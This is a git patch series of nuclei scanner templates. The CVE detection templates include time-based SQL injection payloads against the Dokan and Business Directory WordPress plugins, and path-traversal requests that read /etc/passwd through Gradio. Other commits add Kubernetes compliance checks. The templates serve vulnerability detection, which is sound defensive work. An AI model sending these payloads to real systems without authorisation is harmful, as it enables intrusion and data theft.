https://nvd.nist.gov/vuln/detail/CVE-2024-3922 + - https://dokan.co/docs/wordpress/changelog/ + tags: cve,cve2024,dokan,wp-plugin + +http: + - raw: + - | + POST /wp-admin/admin.php?webhook=dokan-moip HTTP/1.1 + Host: {{Hostname}} + + {"env":"1","event":"invoice.created","resource":{"subscription_code":"11111' and (select 1 from (select sleep( if(1=1,6,0) ))x )='"}} + + matchers: + - type: dsl + dsl: + - 'duration>=6' + - 'status_code == 302' + condition: and From 476b712cee1cc8522ce13e6ad2209427138e3513 Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Sat, 15 Jun 2024 18:35:37 +0300 Subject: [PATCH 0238/1841] add CVE-2024-4443 --- http/cves/2024/CVE-2024-4443.yaml | 33 +++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 http/cves/2024/CVE-2024-4443.yaml diff --git a/http/cves/2024/CVE-2024-4443.yaml b/http/cves/2024/CVE-2024-4443.yaml new file mode 100644 index 0000000000..77dc1ea74d --- /dev/null +++ b/http/cves/2024/CVE-2024-4443.yaml @@ -0,0 +1,33 @@ +id: CVE-2024-4443 + +info: + name: Business Directory < 6.4.3 SQL Injection + author: securityforeveryone + severity: critical + description: | + The Business Directory Plugin Easy Listing Directories for WordPress plugin for WordPress is vulnerable to time-based SQL Injection via the ‘listingfields’ parameter in all versions up to, and including, 6.4.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2024-4443 + - https://plugins.trac.wordpress.org/browser/business-directory-plugin/trunk/includes/fields/class-fieldtypes-select.php#L110 + - https://plugins.trac.wordpress.org/changeset/3089626/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/982fb304-08d6-4195-97a3-f18e94295492?source=cve + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-4443 + epss-score: 0.00063 + epss-percentile: 0.27036 + tags: sqli,vuln,cve,cve2024,wp-plugin + +http: + - method: GET + path: + - "{{BaseURL}}/business-directory/?dosrch=1&q=&wpbdp_view=search&listingfields[+or+sleep(if(1%3d1,4,0))+))--+-][1]=" + + matchers: + - type: dsl + dsl: + - 'duration>=4' + - 'status_code == 200' + - 'contains_all(body,"Business Directory","No listings found")' + condition: and From 853c26c229dd2b15c7b1ad7b142dae5cf53ed3a4 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Sat, 15 Jun 2024 20:09:51 +0200 Subject: [PATCH 0239/1841] Update ibm-security-access-manager.yaml --- http/exposed-panels/ibm/ibm-security-access-manager.yaml | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/http/exposed-panels/ibm/ibm-security-access-manager.yaml b/http/exposed-panels/ibm/ibm-security-access-manager.yaml index 9b686a0938..93e10281b7 100644 --- a/http/exposed-panels/ibm/ibm-security-access-manager.yaml +++ b/http/exposed-panels/ibm/ibm-security-access-manager.yaml @@ -2,7 +2,7 @@ id: ibm-security-access-manager info: name: IBM Security Access Manager Login Panel - Detect - author: geeknik + author: geeknik,righettod severity: info description: IBM Security Access Manager login panel was detected. reference: @@ -14,8 +14,9 @@ info: metadata: max-request: 1 vendor: ibm + shodan-query: http.title:"IBM Security Access Manager" product: security_access_manager - tags: panel,ibm + tags: panel,ibm,login,detect http: - method: GET @@ -27,7 +28,9 @@ http: - type: word words: - "IBM Security Access Manager" + - "IBM Security Access Manager" part: body + condition: or - type: word words: @@ -40,4 +43,3 @@ http: - "/mga/sps/authsvc/policy/forgot_password" part: body condition: and -# digest: 4a0a00473045022100b3c31b972a1af3fbf321e8d2fad135f3c60e69ab84023684e3bdc1903e0a3f75022016212bd0980f645527268ebe265aed9838f5fe47d1fd9a37ffbac227e5765894:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From f7264f85de79ac9e0b12a53fae105b38726c5c93 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Sat, 15 Jun 2024 23:59:20 +0530 Subject: [PATCH 0240/1841] Create CVE-2023-37645.yaml --- http/cves/2023/CVE-2023-37645.yaml | 44 ++++++++++++++++++++++++++++++ 1 file changed, 44 insertions(+) create mode 100644 http/cves/2023/CVE-2023-37645.yaml diff --git a/http/cves/2023/CVE-2023-37645.yaml b/http/cves/2023/CVE-2023-37645.yaml new file mode 100644 index 0000000000..de0ad26ea5 --- /dev/null +++ b/http/cves/2023/CVE-2023-37645.yaml @@ -0,0 +1,44 @@ +id: CVE-2023-37645 + +info: + name: eyoucms v1.6.3 - Information Disclosure Vulnerability + author: pussycat0x + severity: medium + description: eyoucms v1.6.3 was discovered to contain an information disclosure vulnerability via the component /custom_model_path/recruit.filelist.txt. + impact: | + An attacker can exploit this vulnerability to gain sensitive information. + remediation: | + Upgrade eYouCMS to a patched version to mitigate CVE-2023-37645. + reference: + - https://github.com/weng-xianhu/eyoucms/issues/50 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2023-37645 + cwe-id: CWE-668 + epss-score: 0.00046 + epss-percentile: 0.15636 + cpe: cpe:2.3:a:eyoucms:eyoucms:1.6.3:*:*:*:*:*:*:* + metadata: + vendor: eyoucms + product: eyoucms + fofa-query: icon_hash="-614262549" + tags: cve,cve2023,exposure + +http: + - method: GET + path: + - "{{BaseURL}}/data/model/custom_model_path/recruit.filelist.txt" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "application/admin/" + - "template/pc/" + condition: and + + - type: status + status: + - 200 From a1a14bc17d9826a4c5b0a3fb8a1085f2688df0a4 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Sat, 15 Jun 2024 20:35:50 +0200 Subject: [PATCH 0241/1841] Update ibm-note-login.yaml --- http/exposed-panels/ibm/ibm-note-login.yaml | 11 ++++++++--- 1 file changed, 8 insertions(+), 3 deletions(-) diff --git a/http/exposed-panels/ibm/ibm-note-login.yaml b/http/exposed-panels/ibm/ibm-note-login.yaml index a1e490ec76..a1e16643c0 100644 --- a/http/exposed-panels/ibm/ibm-note-login.yaml +++ b/http/exposed-panels/ibm/ibm-note-login.yaml @@ -2,7 +2,7 @@ id: ibm-note-login info: name: IBM iNotes Login Panel - Detect - author: dhiyaneshDK + author: dhiyaneshDK,righettod severity: info description: IBM iNotes login panel was detected. reference: @@ -14,22 +14,27 @@ info: metadata: max-request: 2 vendor: ibm + shodan-query: http.title:"IBM iNotes Login" product: inotes - tags: ibm,edb,panel + tags: ibm,edb,panel,login,detect http: - method: GET path: - '{{BaseURL}}' - '{{BaseURL}}/names.nsf' + - '{{BaseURL}}/webredir.nsf' + + stop-at-first-match: true matchers-condition: and matchers: - type: word words: - 'IBM iNotes Login' + - 'Lotus iNotes Login Screen' + condition: or - type: status status: - 200 -# digest: 4a0a004730450220625a17ef31b35dda3592e49539d8304cc60542ca9c8d2ec4f5509568cd46f673022100f22616c9c57ba6f9ea927df6ff590fcbeb9eb33d5a1afcf66c6dd0afe77f2d7d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From f35d7dccc83c24ae898d91bd1d3a20bb1e471714 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 16 Jun 2024 05:52:46 +0530 Subject: [PATCH 0242/1841] minor update --- http/cves/2021/CVE-2021-43831.yaml | 36 +++++++++++++++--------------- 1 file changed, 18 insertions(+), 18 deletions(-) diff --git a/http/cves/2021/CVE-2021-43831.yaml b/http/cves/2021/CVE-2021-43831.yaml index 85711779f2..d231cceb03 100644 --- a/http/cves/2021/CVE-2021-43831.yaml +++ b/http/cves/2021/CVE-2021-43831.yaml @@ -14,15 +14,19 @@ info: - https://github.com/gradio-app/gradio/security/advisories/GHSA-rhq2-3vr9-6mcr - https://github.com/gradio-app/gradio/commit/41bd3645bdb616e1248b2167ca83636a2653f781 classification: - cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L - cvss-score: 8.3 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N + cvss-score: 7.7 cve-id: CVE-2021-43831 + cwe-id: CWE-22 + epss-score: 0.00063 + epss-percentile: 0.26511 cpe: cpe:2.3:a:gradio_project:gradio:*:*:*:*:*:python:*:* metadata: - vendor: Gradio - product: Gradio + vendor: gradio_project + product: gradio + framework: python shodan-query: title:"Gradio" - tags: cve,cve2021,lfi,Gradio,traversal + tags: cve,cve2021,lfi,gradio http: - method: GET @@ -35,18 +39,14 @@ http: - /windows/win.ini stop-at-first-match: true - matchers-condition: or + matchers-condition: and matchers: - - type: dsl - dsl: - - "regex('root:.*:0:0:', body)" - - "status_code == 200" - condition: and + - type: regex + regex: + - "root:.*:0:0:" + - "\\[(font|extension|file)s\\]" + condition: or - - type: dsl - dsl: - - "contains(body, 'bit app support')" - - "contains(body, 'fonts')" - - "contains(body, 'extensions')" - - "status_code == 200" - condition: and \ No newline at end of file + - type: status + status: + - 200 From 62463135dfe78696218bb0f865c6c0f2eb8778e3 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 16 Jun 2024 06:06:45 +0530 Subject: [PATCH 0243/1841] minor update --- http/cves/2024/CVE-2024-1728.yaml | 51 +++++++++++++++---------------- 1 file changed, 25 insertions(+), 26 deletions(-) diff --git a/http/cves/2024/CVE-2024-1728.yaml b/http/cves/2024/CVE-2024-1728.yaml index ea0a1de886..a75eb9bce3 100644 --- a/http/cves/2024/CVE-2024-1728.yaml +++ b/http/cves/2024/CVE-2024-1728.yaml @@ -1,13 +1,13 @@ id: CVE-2024-1728 info: - name: Local File Inclusion in Gradio + name: Gradio > 4.19.1 UploadButton - Path Traversal author: isacaya severity: high description: | - Improper validation of user-supplied input in the UploadButton component leads to an LFI vulnerability. + gradio-app/gradio is vulnerable to a local file inclusion vulnerability due to improper validation of user-supplied input in the UploadButton component. impact: | - An attacker would be able to view the contents of a file on the computer. + Attackers can exploit this vulnerability to read arbitrary files on the filesystem, such as private SSH keys, by manipulating the file path in the request to the `/queue/join` endpoint. This issue could potentially lead to remote code execution. The vulnerability is present in the handling of file upload paths, allowing attackers to redirect file uploads to unintended locations on the server. remediation: | Update to version 4.19.2. reference: @@ -18,11 +18,14 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2024-1728 + cwe-id: CWE-22 + epss-score: 0.00044 + epss-percentile: 0.10164 metadata: - vendor: Gradio - product: Gradio - shodan-query: title:"Gradio" - tags: cve,cve2024,lfi,Gradio,traversal + vendor: gradio + product: gradio + shodan-query: html:"__gradio_mode__" + tags: cve,cve2024,lfi,gradio,intrusive http: - raw: @@ -46,28 +49,24 @@ http: - type: regex internal: true regex: - - "C:.*\\win\\.ini" - "/tmp/gradio/.*/passwd" + - "C:.*\\win\\.ini" name: extracted_path - stop-at-first-match: true - matchers-condition: or - matchers: - - type: dsl - dsl: - - "regex('root:.*:0:0:', body)" - - "status_code == 200" - condition: and - - - type: dsl - dsl: - - "contains(body, 'bit app support')" - - "contains(body, 'fonts')" - - "contains(body, 'extensions')" - - "status_code == 200" - condition: and - payloads: path: - /etc/passwd - - /windows/win.ini \ No newline at end of file + - /windows/win.ini + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - "\\[(font|extension|file)s\\]" + condition: or + + - type: status + status: + - 200 From a7f945957026558cacbeb46398f6a00537213988 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 16 Jun 2024 06:08:42 +0530 Subject: [PATCH 0244/1841] minor update --- http/cves/2023/CVE-2023-37645.yaml | 12 ++++++++---- 1 file changed, 8 insertions(+), 4 deletions(-) diff --git a/http/cves/2023/CVE-2023-37645.yaml b/http/cves/2023/CVE-2023-37645.yaml index de0ad26ea5..dc81f35dcb 100644 --- a/http/cves/2023/CVE-2023-37645.yaml +++ b/http/cves/2023/CVE-2023-37645.yaml @@ -17,13 +17,17 @@ info: cve-id: CVE-2023-37645 cwe-id: CWE-668 epss-score: 0.00046 - epss-percentile: 0.15636 + epss-percentile: 0.16551 cpe: cpe:2.3:a:eyoucms:eyoucms:1.6.3:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 vendor: eyoucms product: eyoucms - fofa-query: icon_hash="-614262549" - tags: cve,cve2023,exposure + fofa-query: + - icon_hash="-614262549" + - title="eyoucms" + tags: cve,cve2023,info-leak,eyoucms http: - method: GET @@ -37,7 +41,7 @@ http: words: - "application/admin/" - "template/pc/" - condition: and + condition: and - type: status status: From 1fb4542c78153de1c2df5ed9aa67c5130ed4475b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 16 Jun 2024 10:24:40 +0400 Subject: [PATCH 0245/1841] added security and compliance templates --- .../deployments/k8s-seccomp-profile-set.yaml | 53 ++++++++++++++++++ .../k8s-def-egress-rules.yaml | 48 ---------------- .../k8s-netpol-egress-rules.yaml | 47 ++++++++++++++++ .../k8s-netpol-namespace.yaml | 48 ++++++++++++++++ .../k8s-network-ingress-rules.yaml | 27 ++++----- .../network-policies/k8s-ns-policy-set.yaml | 55 ------------------- .../k8s-allow-privilege-escalation-set.yaml | 4 +- .../k8s-audit-log-path-set.yaml | 40 ++++++++++++++ .../k8s-enc-prov-conf.yaml | 38 +++++++++++++ .../k8s-etcd-cafile-set.yaml | 39 +++++++++++++ .../k8s-etcd-files-set.yaml | 39 +++++++++++++ .../k8s-ns-usage-check.yaml | 40 ++++++++++++++ .../k8s-svc-acct-issuer-set.yaml | 38 +++++++++++++ .../security-compliance/k8s-svc-acct-key.yaml | 40 ++++++++++++++ .../k8s-svc-acct-lookup-set.yaml | 38 +++++++++++++ .../k8s-tls-config-set.yaml | 41 ++++++++++++++ 16 files changed, 517 insertions(+), 118 deletions(-) create mode 100644 cloud/kubernetes/deployments/k8s-seccomp-profile-set.yaml delete mode 100644 cloud/kubernetes/network-policies/k8s-def-egress-rules.yaml create mode 100644 cloud/kubernetes/network-policies/k8s-netpol-egress-rules.yaml create mode 100644 cloud/kubernetes/network-policies/k8s-netpol-namespace.yaml delete mode 100644 cloud/kubernetes/network-policies/k8s-ns-policy-set.yaml create mode 100644 cloud/kubernetes/security-compliance/k8s-audit-log-path-set.yaml create mode 100644 cloud/kubernetes/security-compliance/k8s-enc-prov-conf.yaml create mode 100644 cloud/kubernetes/security-compliance/k8s-etcd-cafile-set.yaml create mode 100644 cloud/kubernetes/security-compliance/k8s-etcd-files-set.yaml create mode 100644 cloud/kubernetes/security-compliance/k8s-ns-usage-check.yaml create mode 100644 cloud/kubernetes/security-compliance/k8s-svc-acct-issuer-set.yaml create mode 100644 cloud/kubernetes/security-compliance/k8s-svc-acct-key.yaml create mode 100644 cloud/kubernetes/security-compliance/k8s-svc-acct-lookup-set.yaml create mode 100644 cloud/kubernetes/security-compliance/k8s-tls-config-set.yaml diff --git a/cloud/kubernetes/deployments/k8s-seccomp-profile-set.yaml b/cloud/kubernetes/deployments/k8s-seccomp-profile-set.yaml new file mode 100644 index 0000000000..ca1b3adbbb --- /dev/null +++ b/cloud/kubernetes/deployments/k8s-seccomp-profile-set.yaml @@ -0,0 +1,53 @@ +id: k8s-seccomp-profile-set + +info: + name: Set appropriate seccomp profile + author: princechaddha + severity: medium + description: Checks if the seccomp profile is set to docker/default or runtime/default in Kubernetes Deployments. + impact: | + Using a default seccomp profile helps in reducing the attack surface of the container by limiting the syscalls containers can make, which can prevent certain types of exploits. + remediation: | + Ensure that all containers in Kubernetes Deployments have a seccomp profile of docker/default or runtime/default set in their security contexts. + reference: + - https://kubernetes.io/docs/tutorials/clusters/seccomp/ + tags: cloud,devops,kubernetes,security,devsecops,containers + +flow: | + code(1); + for (let deployment of template.items) { + set("deployment", deployment) + javascript(1); + } + +self-contained: true +code: + - engine: + - sh + - bash + source: kubectl get deployments --all-namespaces --output=json + extractors: + - type: json + name: items + internal: true + json: + - '.items[]' + +javascript: + - code: | + deployment = JSON.parse(template.deployment); + deployment.spec.template.spec.containers.forEach(container => { + if (container.securityContext && container.securityContext.seccompProfile && + (container.securityContext.seccompProfile.type === 'RuntimeDefault' || container.securityContext.seccompProfile.type === 'DockerDefault')) { + // No action needed, configured properly + } else { + let result = (`Deployment '${deployment.metadata.name}' in namespace '${deployment.metadata.namespace}' does not have an appropriate seccomp profile set.`); + Export(result); + } + }); + + extractors: + - type: dsl + dsl: + - response +# digest: 4a0a004730450221008b59741a5c3cbb00fea807cbfad091c4bbd5b4cfb68d0eaba6cbad0f5b41b031022021a3ff36185afd480db929ad18207f2b03a2a823ec1d1858de0facf7fd7b2bbf:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/network-policies/k8s-def-egress-rules.yaml b/cloud/kubernetes/network-policies/k8s-def-egress-rules.yaml deleted file mode 100644 index e6c88c2c1d..0000000000 --- a/cloud/kubernetes/network-policies/k8s-def-egress-rules.yaml +++ /dev/null @@ -1,48 +0,0 @@ -id: k8s-def-egress-rules - -info: - name: Ensure egress rules are defined - author: princechaddha - severity: medium - description: Checks for network policies that define specific egress rules, ensuring controlled outbound traffic. - impact: | - Lack of egress rules in network policies may allow unrestricted outbound network traffic. This can lead to potential security risks, including data exfiltration. - remediation: | - Define egress rules in the network policy to manage and restrict outbound traffic effectively. Specify allowed destinations and ports to limit network traffic. - reference: - - https://kubernetes.io/docs/concepts/services-networking/network-policies/ - tags: cloud,devops,kubernetes,security,devsecops,network - -flow: | - code(1); - for (let policy of template.items) { - set("policy", policy) - javascript(1); - } - -self-contained: true -code: - - engine: - - sh - - bash - source: kubectl get networkpolicies --all-namespaces --output=json - extractors: - - type: json - name: items - internal: true - json: - - '.items[] | {name: .metadata.name, namespace: .metadata.namespace, egress: .spec.egress}' - -javascript: - - code: | - let policyData = template.policy; - if (!policyData.egress || policyData.egress.length === 0) { - let result = `Network policy '${policyData.name}' in namespace '${policyData.namespace}' does not define any egress rules.`; - Export(result); - } - - extractors: - - type: dsl - dsl: - - response -# digest: 490a0046304402203da66eea889668b34e537e161930c32db95c287c91bf4b25ea42fab9207aa20b022066509c25e5056f4f842cc9720a481689aaf3c3208c6f91ce5dd051819e0325a6:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/network-policies/k8s-netpol-egress-rules.yaml b/cloud/kubernetes/network-policies/k8s-netpol-egress-rules.yaml new file mode 100644 index 0000000000..b8f6316dbb --- /dev/null +++ b/cloud/kubernetes/network-policies/k8s-netpol-egress-rules.yaml @@ -0,0 +1,47 @@ +id: netpol-egress-rules + +info: + name: Network policies define egress rules + author: princechaddha + severity: medium + description: Checks for network policies in Kubernetes that do not define egress rules, which can leave the network exposed to external threats. + impact: | + Lack of egress rules in network policies can result in unrestricted outbound network traffic, which may allow data exfiltration or unauthorized access to external services. + remediation: Define egress rules in all network policies to control outbound traffic from your Kubernetes pods, thereby reducing security risks. + reference: + - https://kubernetes.io/docs/concepts/services-networking/network-policies/ + tags: cloud,devops,kubernetes,security,devsecops,network + +flow: | + code(1); + for (let policy of template.items) { + set("policy", policy) + javascript(1); + } + +self-contained: true +code: + - engine: + - sh + - bash + source: kubectl get networkpolicies --all-namespaces --output=json + extractors: + - type: json + name: items + internal: true + json: + - '.items[] | {policy: .metadata.name, egress: .spec.egress}' + +javascript: + - code: | + let policyData = JSON.parse(template.policy); + if (!policyData.egress || policyData.egress.length === 0) { + let result = (`Network policy '${policyData.policy}' does not define egress rules.`); + Export(result); + } + + extractors: + - type: dsl + dsl: + - response +# digest: 4b0a00483046022100adb84e8a912b21d2e2bfd1f9253aec9cc33b6feb9fe7ee538ee0057e61ef8bb9022100d26ff6d9a2ac5f662df09dbb322793b0f9402594c96c361189367f58586344bc:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/network-policies/k8s-netpol-namespace.yaml b/cloud/kubernetes/network-policies/k8s-netpol-namespace.yaml new file mode 100644 index 0000000000..2051aae380 --- /dev/null +++ b/cloud/kubernetes/network-policies/k8s-netpol-namespace.yaml @@ -0,0 +1,48 @@ +id: k8s-netpol-namespace + +info: + name: Network Policies specify namespace + author: princechaddha + severity: medium + description: Checks for Kubernetes Network Policies that do not specify a namespace, which can lead to potential misconfigurations and security issues. + impact: | + Omitting the namespace in Network Policies can cause the policies to apply incorrectly, potentially exposing Kubernetes resources to unauthorized access. This poses a security risk by not isolating network traffic properly within the cluster. + remediation: | + Ensure that all Network Policies explicitly define a namespace to maintain proper network isolation and security boundaries. + reference: + - https://kubernetes.io/docs/concepts/services-networking/network-policies/ + tags: cloud,devops,kubernetes,security,devsecops,networking + +flow: | + code(1); + for (let policy of template.items) { + set("policy", policy) + javascript(1); + } + +self-contained: true +code: + - engine: + - sh + - bash + source: kubectl get netpol --all-namespaces --output=json + extractors: + - type: json + name: items + internal: true + json: + - '.items[] | {policy: .metadata.name, namespace: .metadata.namespace}' + +javascript: + - code: | + let policyData = JSON.parse(template.policy); + if (!policyData.namespace) { + let result = (`Network Policy '${policyData.policy}' does not specify a namespace.`); + Export(result); + } + + extractors: + - type: dsl + dsl: + - response +# digest: 490a00463044022005edb8b78c4db40572f8297946636ce446d578c62f1ec7bf7f1621ed021f27c9022078555811953b55f080c0dc21ec6138fbd712b5069ca571e2492c5e7cc3172759:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/network-policies/k8s-network-ingress-rules.yaml b/cloud/kubernetes/network-policies/k8s-network-ingress-rules.yaml index 77a341ebdb..0d8070c784 100644 --- a/cloud/kubernetes/network-policies/k8s-network-ingress-rules.yaml +++ b/cloud/kubernetes/network-policies/k8s-network-ingress-rules.yaml @@ -1,21 +1,22 @@ -id: k8s-network-ingress-rules +id: k8s-ingress-rules info: - name: Network policies define ingress + name: Define network ingress rules author: princechaddha severity: medium - description: Ensures network policies define ingress rules to control traffic flow within the cluster, enhancing security. + description: Checks if Kubernetes network policies define specific ingress rules, which can help secure network communication within the cluster. impact: | - Without defined ingress rules, network policies might allow unrestricted inbound traffic, potentially exposing the cluster to security threats. Properly defined ingress rules help mitigate this risk by restricting traffic flow. - remediation: Define ingress rules in network policies to restrict and control inbound traffic within the Kubernetes cluster. + Without specific ingress rules defined in network policies, unintended traffic may access pods within the Kubernetes cluster, increasing the risk of malicious activity. + remediation: | + Define specific ingress rules in all network policies to control the flow of inbound traffic to pods, ensuring only authorized traffic can access cluster resources. reference: - https://kubernetes.io/docs/concepts/services-networking/network-policies/ - tags: cloud,devops,kubernetes,security,devsecops,networking + tags: cloud,devops,kubernetes,security,networking flow: | code(1); - for (let networkPolicy of template.items) { - set("networkPolicy", networkPolicy) + for (let policy of template.items) { + set("policy", policy) javascript(1); } @@ -30,13 +31,13 @@ code: name: items internal: true json: - - '.items[]' + - '.items[] | {policy: .metadata.name, ingress: .spec.ingress}' javascript: - code: | - let networkPolicy = JSON.parse(template.networkPolicy); - if (!networkPolicy.spec.ingress || networkPolicy.spec.ingress.length === 0) { - let result = (`Network policy '${networkPolicy.metadata.name}' in namespace '${networkPolicy.metadata.namespace}' does not define any ingress rules.`); + let policyData = JSON.parse(template.policy); + if (!policyData.ingress || policyData.ingress.length === 0) { + let result = `Network policy '${policyData.policy}' does not define any ingress rules.`; Export(result); } @@ -44,4 +45,4 @@ javascript: - type: dsl dsl: - response -# digest: 4a0a00473045022100c53e3615f3c1dd115d8efd4e9415177289e366c07ee24d4694d19c882c77044102203ce3bd2c002e4ab82073e7c770d39298407a1c40246b5c657104d01b4f642f6a:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file +# digest: 4a0a004730450220506a30ff32ae7bcddc875449aabe33208c4437745e3f0ba016b3087a8d780fe2022100c1be39affffaa403e6022ded544a51e09ff5b41c4812601ee90848f89039ae3f:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/network-policies/k8s-ns-policy-set.yaml b/cloud/kubernetes/network-policies/k8s-ns-policy-set.yaml deleted file mode 100644 index 4e11702e52..0000000000 --- a/cloud/kubernetes/network-policies/k8s-ns-policy-set.yaml +++ /dev/null @@ -1,55 +0,0 @@ -id: k8s-ns-policy-set - -info: - name: Network policies specify namespace - author: princechaddha - severity: medium - description: Checks for Kubernetes network policies that do not specify a namespace, potentially leading to misconfigurations and security risks. - impact: | - Failure to specify a namespace in network policies can cause the policies to not be enforced as expected, leading to potential security vulnerabilities where unauthorized traffic could be allowed. - remediation: | - Ensure that all network policies explicitly define the namespace they apply to. This helps in enforcing security boundaries and preventing cross-namespace traffic unless explicitly allowed. - reference: - - https://kubernetes.io/docs/concepts/services-networking/network-policies/ - tags: cloud,devops,kubernetes,security,devsecops,networking - -flow: | - code(1); - for (let policy of template.items) { - set("policy", policy) - javascript(1); - } - -self-contained: true -code: - - engine: - - sh - - bash - source: kubectl get networkpolicies --all-namespaces --output=json - extractors: - - type: json - name: items - internal: true - json: - - '.items[] | {policy: .metadata.name, namespace: .metadata.namespace}' - -javascript: - - code: | - if (template.items.length === 0) { - log(template.items.length) - Export('No network policies found. Ensure that network policies are defined and namespaces are specified.'); - } else { - template.items.forEach(policy => { - let policyData = JSON.parse(policy); - if (!policyData.namespace) { - let result = (`Network Policy '${policyData.policy}' does not specify a namespace.`); - Export(result); - } - }); - } - - extractors: - - type: dsl - dsl: - - response -# digest: 4a0a0047304502204f78530d043f4ee9c2844ef6ea271cdee74ef99154f17f43f120ff4cad1ff417022100dc262780f80d0e64648e5fa555c35032837ae0ecd21c274df318d593c2a1a626:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/pods/k8s-allow-privilege-escalation-set.yaml b/cloud/kubernetes/pods/k8s-allow-privilege-escalation-set.yaml index cde9f87928..d85b30b78d 100644 --- a/cloud/kubernetes/pods/k8s-allow-privilege-escalation-set.yaml +++ b/cloud/kubernetes/pods/k8s-allow-privilege-escalation-set.yaml @@ -34,7 +34,7 @@ code: javascript: - code: | - let podData = JSON.parse(template.container); // container is now a JSON object with 'pod' and 'containers' + let podData = JSON.parse(template.container); podData.containers.forEach(container => { if (container.securityContext && container.securityContext.allowPrivilegeEscalation === true) { let result = (`Container '${container.name}' in pod '${podData.pod}' running with allowPrivilegeEscalation enabled.`); @@ -47,4 +47,4 @@ javascript: - type: dsl dsl: - response -# digest: 490a00463044022022d7414cae87fa28332a6a123d954251d677ec6d3900d9695773585fa2659b1c02200c516a4fac6f46fc00bea745add53ff77b6f95557fceb66c8227ba2d1771ea45:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file +# digest: 490a0046304402202e23ef1e6b258a44e394494f51808bb7b81a856101efe5a929429a6fcde414d4022058eacd480cb3e4b61fe6a86674f1f218b53144a3e8fed02c20554c0a34ae00d1:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file diff --git a/cloud/kubernetes/security-compliance/k8s-audit-log-path-set.yaml b/cloud/kubernetes/security-compliance/k8s-audit-log-path-set.yaml new file mode 100644 index 0000000000..0566d127fa --- /dev/null +++ b/cloud/kubernetes/security-compliance/k8s-audit-log-path-set.yaml @@ -0,0 +1,40 @@ +id: audit-log-path-set + +info: + name: Ensure audit-log-path set + author: princechaddha + severity: medium + description: Checks if the audit-log-path argument is properly set in the Kubernetes API server configuration, which is essential for maintaining a reliable audit trail. + impact: | + Without the audit-log-path argument, Kubernetes does not record API server audit logs, reducing the visibility into operations and making it harder to detect and respond to malicious activities. + remediation: | + Configure the Kubernetes API server to include the audit-log-path argument pointing to a secure, writeable directory where audit logs will be stored. Ensure that this directory is properly secured and regularly monitored. + reference: + - https://kubernetes.io/docs/tasks/debug-application-cluster/audit/ + tags: cloud,devops,kubernetes,security,devsecops,api-server + +self-contained: true +code: + - engine: + - sh + - bash + source: | + kubectl get pods -n kube-system -l component=kube-apiserver -o jsonpath="{.items[*].spec.containers[*].command}" + + matchers-condition: and + matchers: + - type: word + words: + - 'kube-apiserver' + + - type: word + words: + - "audit-log-path" + negative: true + + extractors: + - type: dsl + dsl: + - "API server configuration is missing the audit-log-path argument." + +# digest: 4c0a006730b50222003e5c33fedeeb5d9b8b9af1d43e89b7b8b97c51aa77c345d7f976f9350e22e746022 diff --git a/cloud/kubernetes/security-compliance/k8s-enc-prov-conf.yaml b/cloud/kubernetes/security-compliance/k8s-enc-prov-conf.yaml new file mode 100644 index 0000000000..4a95a30227 --- /dev/null +++ b/cloud/kubernetes/security-compliance/k8s-enc-prov-conf.yaml @@ -0,0 +1,38 @@ +id: k8s-enc-prov-conf + +info: + name: Ensure that encryption providers are configured + author: princechaddha + severity: medium + description: Checks if encryption providers are appropriately configured in Kubernetes, ensuring that data at rest is secured. + impact: | + Misconfigured encryption providers can lead to unsecured data at rest, potentially exposing sensitive information to unauthorized access. + remediation: | + Ensure that the encryption provider configuration file is set up correctly and referenced properly in the API server configuration. Encryption should be enabled and configured according to the security best practices. + reference: + - https://kubernetes.io/docs/tasks/administer-cluster/encrypt-data/ + tags: cloud,devops,kubernetes,security,devsecops,encryption + +self-contained: true +code: + - engine: + - sh + - bash + source: | + kubectl get pods -n kube-system -l component=kube-apiserver -o jsonpath="{.items[*].spec.containers[*].command}" + + matchers-condition: and + matchers: + - type: word + words: + - 'kube-apiserver' + + - type: word + words: + - "--encryption-provider-config" + negative: true + + extractors: + - type: dsl + dsl: + - "Encryption provider configuration is not appropriately set." 